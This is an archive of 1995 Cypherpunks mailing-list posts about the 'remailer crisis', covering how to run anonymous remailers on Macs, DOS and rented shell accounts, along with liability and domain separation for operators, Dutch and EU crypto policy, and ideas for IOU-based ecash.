>But is your Mac on the Internet on a more or less continuous basis? A
>remailer that only works when the owner happens to log on to collect
>his mail is not terribly useful (though not useless, as others have
>also noted....just a "very unpredictable lag time" remailer, sort of
>the "surface mail" of e-mail).

Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week
(during school months!;-)) The server you just mailed to is on this
machine.

>It happens that the Net is mainly built up of Unix boxes, hence the
>focus here on Unix. OS/2, Windows, and Mac boxes will be used
>increasinly for constant connection applications, so the idea has
>merit, long term.

I understand this, and am trying my best to cope. I am currently in the
process of developing a name server for the Mac, because the Mac has alot
against it when it comes to being a real eintity on the 'Net.

>(Another nit: the Mac, which is what I also use, currently lacks
>preemptive multitasking. Thus, if one's Mac is playing a multimedia
>CD-ROM when new mail comes in, it likely won't get remailed until the
>first app quits or is manually switched out. (Yeah, a few things like
>print drivers can run in background, and maybe the new TIA emulators
>can trick the OS into processing SLIP or PPP mail in the background,
>but who knows?) The consensus is that the Mac is powerful, but it
>ain't cut out yet to be a Unix box.)

I agree that the Mac lacks some of the more powerful Unix features, namely
preemtive multitasking, but I also believe that, at least with the newer
Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck
Shotton's MacHTTP WWW server for the Mac? An excelent piece of software
that gives literally on demand, and at least with my copy, it is always in
the background. Really about the only thing that cuts out CPU timesharing
is multimedia, mostly 3D grahpis games and highly intense graphics
software, neither of which I use (much!;-))

>The language is a lesser deal. Remember that Eric Hughes knocked out
>the first remailer in Perl in a few days, and MacPerl exists for the
>Mac. Going to Pascal would probably be more trouble than it's worth.

I thought that it was in Perl. I have tried pulling Unix Perl scripts and
running them under MacPerl, but it doesn't quite do it. In fact, it usually
doesn't do anything but spew errors back at you.

>But the most important feature to have is a solid, reliable connection
>to the Net. A computer that gets taken to classes, is not connected to
>the Net, etc., is not very useful as a remailer.

As I noted, I have a constant 56k line in/ out. And mine never moves...
it's a bit large... mine is a Quadra 660av (ugh).

>(The key is not that a remailer can sometimes remail, but that it can
>be counted on to be part of chain without the mail getting "dropped on
>the floor.")
>
>--Tim May

As far as I can tell, and maybe you have other knowedge on this, my
situation should work, assuming I can run the software. What do you think?
Should the remailer Perl script run under MacPerl?

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 3rd! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usura@vox.xs4all.nl (Alex de Joode)
Date: Sat, 21 Jan 95 03:02:59 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <FR69yc1w165w@vox.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


jalicqui@prairienet.org (Jeff Licquia) writes:

: Would it be better if you didn't have to dedicate your box to Linux, but
: just ran it every so often when you weren't playing with Codewright?  If you
: had some store-and-forward mail system (like UUCP or Fido), you wouldn't
: need to say goodbye to DOS/Windows.

Patrick Oonk <kafka@xs4all.nl> has written a remailer for Waffle,
(wich is an UUCP system), I use that for vox.xs4ll.nl . Is works
under DOS. 

Regards,

Alex de Joode
usura@replay.com
http://xs4all.nl/~usura




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Sat, 21 Jan 95 10:25:46 PST
To: cyperpunks@toad.com
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <VH6D1c2w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) writes:

> > data havens. I haven't bothered to hunt for Lance's address, which is not
> > given, but really I thought someone as prominent a SysLawyer as him would
> > be clued in. Nor have I found the time to send WIRED a letter. 
> 
> First, I want to know how Rishab, in India, gets "Wired" so early (or
> why I, right next to Silicon Valley, get it so late). He's mentioned

I used to get it three months late, as TNT was doing something really weird
to WIRED. I screamed. So they send it express hot off the press, which has
worked for two issues so far.

> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of

No, I don't think he's a lawyer, but he wrote SysLaw which is widely hyped
as _the_ law book for BBS sysops. It's actually not that good - the EFF
recommends another one the name of which I've forgotten. 


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sat, 21 Jan 95 00:36:26 PST
To: sameer <cypherpunks@toad.com
Subject: Re: Remailer In a Box available for beta testing
In-Reply-To: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>
Message-ID: <X2C8lKjqRWmA077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>, you wrote:
> (Sameer uses PGP)

> 3) If you wish, you can setup a .forward file to point to mailfilters
> or to another account.
>
> 4) Run the program /usr/local/lib/boxed-remailer/install_remail. The
> remailer will be installed, and non-remailed mail will be acted upon
> according to how the account was setup before you ran the program.
>
> 5) Answer the questions, they should be pretty simple.
>
> 	Once an account is created there is a one week free grace period.
> If you'd like to continue the account you can pay for it.
>
> 	If you have problems and suggestions, make sure you mail me, and
> I'll fix it. This is still in beta testing, so if you have problems I won't
> disable the account waiting for payment until the problems are fixed.
>

One minor question, is it possible to set it up so that it is not a final
hop remailer. In other words the remailer is set up to pass its mail on to
another remailer which is the final destination (preferably non-U.S.) If
so, I'm in. I've already got my account on c2 doing three things, what's
one more. If we could make this possible, it could really propagate
remailers as it removes some of the liability from those who can't afford
it.

I would love to run a final hop remailer, unfortunately financially I
barely have enough cash to keep on the net, let alone pay for a lawyer if
needed. Hopefully this is only temporary, (wifey finally found a job, now
it's catch-up time) but I'm unfortunately getting used to it.


Sam
- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
     Any two philosophers can tell each other all they know in two hours.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLyDF38lnXxBRSgfNAQG95gf9GHzDj4NYoMe+mwms8kbeVEpDIZo6gI2u
0CnmGQ6QgHPloUim53cHeJXO/wockD7ofRy/OiN0ohbCk51R7MJ2mpgC1VMZRy1h
PYz+HILjTxI4Ejkf7JFWiaDl9YBiXJojdkkyLvqHIGvz2v/jgY45zaR9jyhwDQYf
1qxZmzi9S2VvHa+e4KJ99tG/+4C/b92W5KtQPd3P/+N1dUHzWhiBkQTxi2Sbj/DW
GkS4O5qwGQS7FXIEN880HJzIExLTSg3UgbmkRPNo9yyETvco/XBYTpzTefVPNUC9
rCW/pgl8GpJtYIsXYn65j0p1xWUTjYvTpXFyXvXjBr1eFF/IVHJ4gQ==
=bV0h
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 20 Jan 95 23:08:04 PST
To: adamfast@seanet.com (Adam Feuer)
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.NXT.3.91.950120171115.12961A-100000@kisa>
Message-ID: <199501210707.CAA29137@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


adamfast@seanet.com wrote:
|   well, one way of doing it is LETS, the Local Exchange Trading System-- a
| non-computerized way of exchanging value in a community. it doesn't
| exactly use money. there are thousands of LETS's worldwide, i've never


        LETS seem to have little use for anonymity or privacy.  They
may also involve substantial risks of inflation/devaluation; I'm
discussing this with Michael Linton on www-buyinfo.
 
(www-buyinfo-request@ALLEGRA.ATT.COM)
 
 
Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 20 Jan 95 14:37:02 PST
To: cypherpunks@toad.com
Subject: Netherlands crypto ban?
Message-ID: <gate.HRP0yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



What's the update on the move to ban private crypto in Holland? Last I remember
there were trial balloons, but nothing happened.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 20 Jan 95 14:23:56 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <gate.1uq0yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Tim urges recently that we need to do something about the "remailer crisis."

I remember Sameer once mentioning that he could set up remailer-in-a-box 
accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore
indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows
'remail-to-yourself' blind-server accounts for $10 / meg or something. That's
probably a bit expensive for a sponsor of a public remailer (any stats on 
average remailer traffic?). I never did here any more from sameer or anyone
else about remailers-in-boxed-accounts. I for one would be willing to 'sponsor'
a remailer account on any system with a small fee - I can't run my own as my 
private site looks at the world through PPP.

I suggest that 'sponsored' remailers are a better way of making remailers
economically viable for people like Sameer, who are the real, if not nominal,
administrators. Though I hardly use remailers, those who do would probably
make better (and more easily executed) use of their money if they sponsor
remailer accounts on Cypherpunk ISPs like c2, rather than pay a (truenamed, 
legally vulnerable) operator for any single remailer.

Sameer's blind-server code can come in use to make any link between the 
sponsor and her sponsored account very hard to detect.

The advantages of sponsoring remailer-site operators to create remailing
accounts, rather than pay an individual remailer operator, are many:
1. innocent until proven guilty - presumably sponsors do use remailers a lot;
   but not necessarily. So the payment transaction can be via truename, rather
   than via some complicated anonymous means, and still leave the sponsor
   unimplicated
2. legal - an operator of a single remailer is vulnerable - technically, if
   not root, and legally otherwise. an administrator of a Cypherpunk ISP is
   not, and does not have the legal right to monitor a customer's traffic,
   and with blind-servers even detailed logging don't lead back to the
   owner of an account, the sponsor, from any _specific_ remailer (though
   a pool of sponsors exist for a pool of remailer account)
3. technical - it's not possible to ban a single remailer, as they may be 
   _many_ on a site. If the site is much more than just remailers, it's not
   really possible to ban the entire site.
4. traffic analysis - more remailers addresses will make traffic analysis
   harder, and chaining more fun - you could chain through multiple accounts
   on a single site with little loss in reliability (though you'll still want
   to go through more sites)
5. remailer explosion - more reliable remailers (due to the '-in-a-box', more 
   users, wider distribution
   

Comments?


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sat, 21 Jan 95 00:09:44 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <199501210809.DAA12896@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Fri, 20 Jan 1995 19:36:34 -0500
> From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
> 
> Certainly, that's what money is after all. Pretty much.  But how are you
> going to transfer these IOUs electronically in a way that is relatively
> fraud-proof?  [...]

  By only trading with trusted partners.  Read on...

> And of course, if you want to use these certificates of value anonymously,
> which is what is required to pay for an anon remailer, there are some
> slightly more stringent requirements. The right kind of ecash protocol can
> still handle it.  But Carol probably shouldn't be paying for a remailer in
> CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a
> big spender that CarolBucks are in wide circulation and used by lots of
> people other then Carol.  Which I guess is possible in your system.

  If the remailer operator trusts Carol, then Carol and the Op can
exchange Op-IOU's for money, or Carol-IOU's for Op-IOU's.  (This is
the base case of the induction for you math geeks.)  Carol can use the
Op-IOU's directly with the Op or 'sell' them to people who want to do
business with the Op.

  If the remailer operator doesn't trust Carol, but there is a chain
of trust from Carol to the remailer operator, then Carol can get IOUs
from someone which the remailer operator does trust.  Call them
Jo-IOUs.  To do this Carol asks Pat who asks ... who asks Jo for an
IOU worth $32.  Carol gives Pat a Carol-IOU worth $32(+transaction fee
is Pat is a greedy sole) in exchange for which Pat gives Carol the
Jo-IOU worth $32 (which Carol got from Pat (which Pat got from some
place only Pat knows for sure)).

  IOU swaps will probably be done under the cover of encryption.
Swaps can also be done with a nice ecash system like Chaum and
Brandt(sp?) have proposed.  But I am not sure it is required.

  Anonymity can come also from the chain of IOU swaps, in the same way
remailers produce anonymity -- each person neglects to tell any others
for whom they carry out IOU swaps.  Sure Pat knows Carol wants a Jo
IOU, but Pat doesn't know why.  Jo could figure out that Jo's IOU went
out to W.Smith, and came back from V.Jones but can't make any
conclusion about weather W. and V. are trading partners or not.  It
would take a conspiracy of each person along the swap path to expose
the real trade.  Alternatively the buyer or seller can out the
transaction.  (But suppose they only know each other via some
anonymous email pool...)

  And privacy (from other than your trading partners) comes from using
encryption during each IOU swap.

  But if you don't trust your trading partners enough to keep quiet
about who you are, by all means use an untraceable ecash system.
(There are other advantages to using blind signatures anyway.)

> A pseudo-anarchist non-state-supported debt system would work fine, but you
> still need a mechanism to transfer your certificates of value, whether they

  Well...  TackyTokens, and a little bit (ha!) of client code (start
with Sameer's?) ought to do the trick.  (So perhaps the original
message's subject ought to have been "Why Ebanks?  Why not a web of
debt-trust?" since it is the central bank I am avoiding here.  Not
tacky tokens.)

  But it isn't really necesary.  Read on...

> [...]  There are advantages and disadvantages to that
> sort of thing, and it might be something interesting to think about, but

  One problem with getting an ecash system off the ground is making
the tokens worth moeny.  The advantage of a distributed web-of-
debt/trust model is that I only need to trade IOUs for US$ with a few
trusted friends.  I don't need to go to any kind of central bank.  No
central bank means no central point to be attacked with guns, hacks,
or taxes.  No central bank means no credit card numbers, money orders,
or green backs mailed away to strangers.

  Another cool thing, and the reason you don't need Chaumian digital
cash, is that the only people you can steal from (or who can steal
from you) are your trusted friends!  If I pass a bogus token in
exchange for a real IOU, then I just ripped off my friend.  The only
place two non-friends interface is at the final buyer-seller
interface.  If the seller refuses to honor the token, the buyer can
ask the friend who gave it to them for a refund, who can ask for a
refund from ... until the token gets back to the thief.  The thief can
either steal from their friend by refusing the refund, or infact honor
the bogus token, and eat the loss (if any).

  One bad thing is anyone can deny service to people by passing bogus
tokens, and then refunding them.  Lukily the friends of the blocker
will notice that when getting tokens through that person, the number
of refunds is higher than average.  In that case, the blocker can be
removed from lists of their friends, and cut out of the economy.

  Denial of service can be prevented another way too -- but it does
require Chaumian blind signatures.  Instead of trading a Carol-IOU for
any old Jo-IOU, Carol might demand a Jo-IOU which is a signature on a
particular (blinded) secret number.  Just as if Carol were doing a
TackyToken protocol exchange directly with Jo.  If Carol gets a thing
from Pat which isn't signed by Jo, Carol complains to Pat.  If Carol
gets a thing which un-blinded isn't a signature by Jo of Carol's
secret number, Carol again complains to Pat.  Symbolically: instead of
a <-> b, then b <-> c, then ... y <-> z; do a -> via b -> via c
... via y -> z signs -> via y ... via b -> to a.  The disadvantage is
that Pr0duct Cypher's Tacky Token code would need to be hacked a bit
more.  And then there is the nasty old issue of algorithm patents.

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sat, 21 Jan 95 03:12:26 PST
To: Rich Lethin <lethin@ai.mit.edu>
Subject: Re: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity]
In-Reply-To: <9501181647.AA13819@toast>
Message-ID: <Pine.3.89.9501210532.B7400-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the enlightening article.
Whenever I start the remailer, now, I won't be so afraid.Love Always,

Carol Anne
ps It too will be on a c2.org type www page type format.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sat, 21 Jan 95 04:07:47 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Linux Remailer Volunteer (Re:The remailer crisis)
In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com>
Message-ID: <Pine.3.89.9501210553.E7400-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


<html><head>
<h1>Volunteering</h1>
</head>
<body><pre><p>
As the Tired, Poor, Project gets it's next machines ready for their
next recipients, I will be able to finally upgrade to a 386, and pass
this 8088, to the next recipient down the line. (yeah!)
<blink>I would volunteer to be your pre-alpha tester</blink>.
I know that if I could run it anybody could be taught to run it. For I
would always be grateful in learning how it was done in the first place,
and will always help those farther down the line than me.
</pre><ul><p>
<li><a href="http="www.c2.org/~carolann/coffee.html">The coffee page has
some nice Cypherpunk links and Lance Cottrell's Homepage link in it</a>.
<p><h3>I would be curious to know how many of you read your mail, and
news with a browser, <a href="mailto:carolann@c2.org>Just click here, 
so I can get an idea</a>. <blink>Thanks ever so much!</blink><p>
<h2><blink>Love Always,</blink><p>
Carol Anne</h2>


Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 21 Jan 95 06:51:24 PST
To: usura@replay.com (Alex de Joode)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501211209.AA07362@xs1.xs4all.nl>
Message-ID: <199501211238.GAA00767@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
>  - The entry point of a remailer is entry@remail.org, 
> 
>  - entry@remail.org has a forward file to: batch@remail.org
>
I would state this is a security breach. entry@remail.org should not
know anything about the second level re-mailers other than a method to
identify them as legitimate.
 
>  - batch@remail.org does the actual remailing, since remail.org has
>    installed some sort of MX'ing all messages that leave batch@remail.org
>    will advertise themself as nobody@expendable.org .
>
The 'client' re-mailers should be the ones to initiate the call-up, not the
entry re-mailer. This way if the portal is compromised no information can
be gained such as the list of clients. The entry re-mailer should sit there
waiting for a call. When it gets one it goes through some kind of verification
process (akin to some comments I maid back in the summer relating to making
all the packets encrypted at all times).
 
>  - If you "loose" expendable.org, you simple set up a new account with
>    MX'ing, the remailer-users will only notice the change in exit-header,
>    the enrty-point of that remailer is still entry@remail.org
> 
If you make the entry point anonymous and have at least two of the entry points
slaved (sorta like collision avoidance on ethernet) then the entry point never
has to change. Also if one goes down the other takes up the slack. It might
also be possible to have it route over-flow packets from the main router to the
slave router when traffic maxes out.

The reality is that the main point of attack is going to be the incoming
since if you take that one (if it is a smalll and simple re-mailer network)
will bring the whole system to its knees.

Take care.


Take care.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 21 Jan 95 05:21:53 PST
To: owner-cypherpunks@toad.com
Subject: Re: Netherlands crypto ban?
Message-ID: <9501211317.AA00188@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


	In my opinion, The Netherlands will not adopt a crypto policy on their
	own, the'll do it if the EC proposes such a "thing". 

Several months ago at a security SIG meeting at OSF, a sr tech guy
from Shell gave a presentation and I went and spoke with him afterwards.
(Not being oblique, I just forget his name.)

Shell needs public key because they want to use email for legal contracts.
They've been waiting for standards to come around, but have given up.
They're currently planning on using NIST's DSS, if they can fix a few things:
    -	Add concepts of time and location (it can be important to prove
	that this was signed last month outside of the U.S.)
    -	Add re-signing with only minor increase in size
	If there are licensing issues, "just buy them off."
They don't like RSA because of the US licensing issues -- it's too hard to
prove you only have to pay for a small portion of your use, for example.
They like DSS because it explicitly does not support privacy, which is
problematic in France, especially.

He's reluctantly inventing this setup because the vendors haven't given him
a world-wide public key story yet.  (DCE 1.2 has/had some plans, and he wanted
to push our licensees to support it, at least.)

Interestingly, things have inverted and the EC (sorry, EU) is looking
for Shell to set a standard.  Several other large companies (Philips,
etc) are also going to follow whatever Shell does.  He thinks it'll be
de-facto standard in 18-24 months.

FYI.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Sat, 21 Jan 95 08:41:38 PST
To: cypherpunks@toad.com
Subject: Remailer Crisis - Part II
Message-ID: <199501211641.AA01584@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The "remailer-in-a-box" solution seems to be on its way to solving the
ebbing number of remailers problem.  The next step is to think of remailers
in a supply and demand context.  From a "maximizing your resources"
standpoint, it doesn't make sense to have one hundred remailers available
(aside from the chaining implications), if the usage/demand needs are met by
twenty.

It's important to create an infrastructure for a large scale remailer
network, but the next step is to actually drive demand (obvious benefits of
increasing privacy levels, blunting traffic analysis, creating a large
enough population that will vocally protest if attempts to restrict
remailers are made, etc.).

I see two ways of doing this.

The first step is education.  Net users, especially the new ones, need to be
educated about the use and benefits/limitations of remailers.  Web pages are
a good start.  The information needs to be easy to understand yet
compelling.  Users need to be shown why remailers are important and be
encouraged to at least try using them once ("want some candy little boy/girl").

The second step is access.  With the advent of commercial Internet
providers, the defacto Net access points are becoming GUI PCs and Macs.  It
is critical that tools be built for these platforms that make using
remailers a transparent and simple task.  (I don't want to belittle GUI
users, I'm using Windows as I write this, but most would rather click a few
buttons and use a list box rather than remember the :: syntax for embedding
remailer commands in their e-mail.)  This was part of my motivation for
writing Private Idaho for Windows Eudora.  I see good GUI premailers or
integrated e-mail scripts as a critical element of remailer success.

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 08:45:46 PST
To: cypherpunks@toad.com
Subject: Re: Data Vaults (vs. Data Havens)
In-Reply-To: <199501210713.XAA17754@netcom13.netcom.com>
Message-ID: <199501211645.IAA13329@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)

   I don't think we ought to call these uses "data havens." Save the term
   "data haven" for those places, in cyberspace or in real space, that
   sell access to Nazi medical experiments, that sell illegal birth
   control information, that buy weapons secrets, and so on. 

I fully concur.  The connotations of the word "haven" imply activities
that ordinary people don't see themselves doing.  This means that
ordinary people won't generally use something called a "haven", even
if they might use exactly the same service called something else.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 08:48:34 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <v01510103ab46516c92d0@[152.97.12.101]>
Message-ID: <199501211648.IAA13338@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)

   I thought that it was in Perl. I have tried pulling Unix Perl scripts and
   running them under MacPerl, but it doesn't quite do it. In fact, it usually
   doesn't do anything but spew errors back at you.

Perl has a lot of Unix-ism in it.  The original remailer, which was
really simple and stupid, only used stdin and stdout and pipes, ...
Oops!  Pipes may or not be supported [well] on the Mac platform.

I suspect a port won't be particularly straightforward.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Sat, 21 Jan 95 07:00:37 PST
To: cypherpunks@toad.com
Subject: jpunix.com and MX'ing
Message-ID: <199501211459.IAA02161@jpunix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 09:12:11 PST
To: cypherpunks@toad.com
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <199501211711.JAA13370@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Greg Broiles <greg@ideath.goldenbear.com>

   In this model, who deals with mailbombs/spams/requests for address blocks?
   It is this sort of administrivia (plus the threat of liability) that
   makes running a remailer troublesome, not a lack of someone's $20/month.

This point is right on.

   I think it's disingenuous to say that "X pays the bills for the network
   link; X purchased the hardware and keeps it running; the box is in X's
   house/office; X is the person who reads complaint mail and responds (or
   fails to); but because Y sends X $20/month, the remailer (and attendant
   liability for its mis/use) belongs to Y."

The whole point of separation of operations and ownership is to
actually separate them.  If the computer/network service owner (X
above) is participating in any _semantically meaningful_ way in the
operation of the remailer service, then they too are part of the
remailer service.  If the computer/network service is responding to
complaint mail, or even getting properly directed complaint mail, they
are exposing themselves to participation in the remailing service.

As with liability for content, the important issue here is the state
of mind of the computer/network operator.  If they know sufficiently
many details about the nature of the remailer operation, the boundary
of separation is breached.  

Unfortunately, the standard mechanism of complaint on the internet is
the postmaster address.  Complainants do not always follow the nice
complaint instructions in the headers of email.  A remailer run out of
a shell account will have postmaster complaints addressed to the
computer/network operator rather than the remailer operator.

Therefore, a second postmaster address is required.  A second
postmaster address means another domain name.  This new domain name
can be either a subdomain or a brand new one.  I don't think it will
matter much, although a domain not related to the computer/network
operator would further the separation.

Now setting up new domain names, while pretty easy, requires the
cooperation of DNS operators.  Typically these connections have been
informal and a low barrier to entry but only if you know somebody who
does domain names.  DNS operation is not yet a separate service to
buy, but I suspect it will become so.  In the meanwhile the offers of
DNS provision by John and Strick are welcome.

   [...] I don't think that anyone - not courts,
   and not the world-in-general - is going to pay attention to that 
   formalism when it's clear that a machine essentially under the control
   of X is being used for 'antisocial' means.

As important as legal protections are, direct action against spammers
attacks the machine infrastructure directly.  A word to the wise
computer/network provider.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 21 Jan 95 09:18:48 PST
To: cypherpunks@toad.com
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210301.TAA09022@netcom14.netcom.com>
Message-ID: <199501211718.JAA13387@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)

   In this model the owner of the machine (who is not himself a remailer,
   only a seller of accounts) simply ignores all such issues of
   mailbombs, spams, request for address blocks.

   [the form letter might include]
   "If you have problems, talk to the
   sender, not to me."

In order to make such a discharge anywhere near believable, you'd have
to provide a way for the complainant to get in touch with the sender.
The sender in this case is the remailer operator.  It would also be a
standard courtesy to forward the misdirected mail.

   Currently the
   remailer sites = remailer accounts, so they have little or no
   protection.

One of the services that RiaB might do well to offer is subdomaining.
It's pretty easy to direct all subdomain mail, which includes
postmaster mail, to a single email address.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Sat, 21 Jan 95 09:39:55 PST
To: remailer-operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211728.LAA04757@jpunix.com>
Message-ID: <199501211739.JAA00303@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text



John A. Perry wrote:
> 
> First of all, I hope you don't mind me posting this to a couple of 
> lists as I find your questions pertinent and should be of value to many 
> readers.

Oops, I actually meant to direct it to the list myself, but forgot
to edit my headers.  Sure.

> 
> > To what extent can the operator of such a remailer really hide his
> > actual site?
> 
> 	It depends on the level of control the remailer operator has on the 
> site that the remailer operates from.

Assume root.

I know that you can set the 'masquerade as' thing in sendmail, but
of course any other SMTP agents you deal with are going to
correctly identify you when you 'HELO' and you're going to wind
up in the header, somewhere... (well, except smail 3.1, and probably
others.)  -- I'm assuming here the best one will be able to do will
be equivalent to a forgery via port 25.

--Craig





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Fri, 20 Jan 95 13:22:09 PST
To: hfinney@shell.portal.com
Subject: Little ebanks -- a modest proposal.
Message-ID: <199501202120.KAA03412@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain



[Executive Summary -- The author proposes a system of stamps for remailers
as a way of starting up an ecash system. The stamps would be sold to the 
public as stamps, but be convertible by remailer operators into real money.]

Hal,

Many thanks for your comments. I'll try to make this less legalistically
impenetrable.

Despite the difficulties, I think anon corps are possible - and legal.
What I was trying to stress is that they are expensive and inefficient: so
you have to be really sure you want anonymity if you are going to use one.

The hurdles to ecash seem more formidable. The problem with moving off
shore and ignoring the SEC, for instance, is that your scheme loses some
credibility. Since the value of ecash is (in the short term, at least)
going to be based on the possibility of converting it into real cash (just
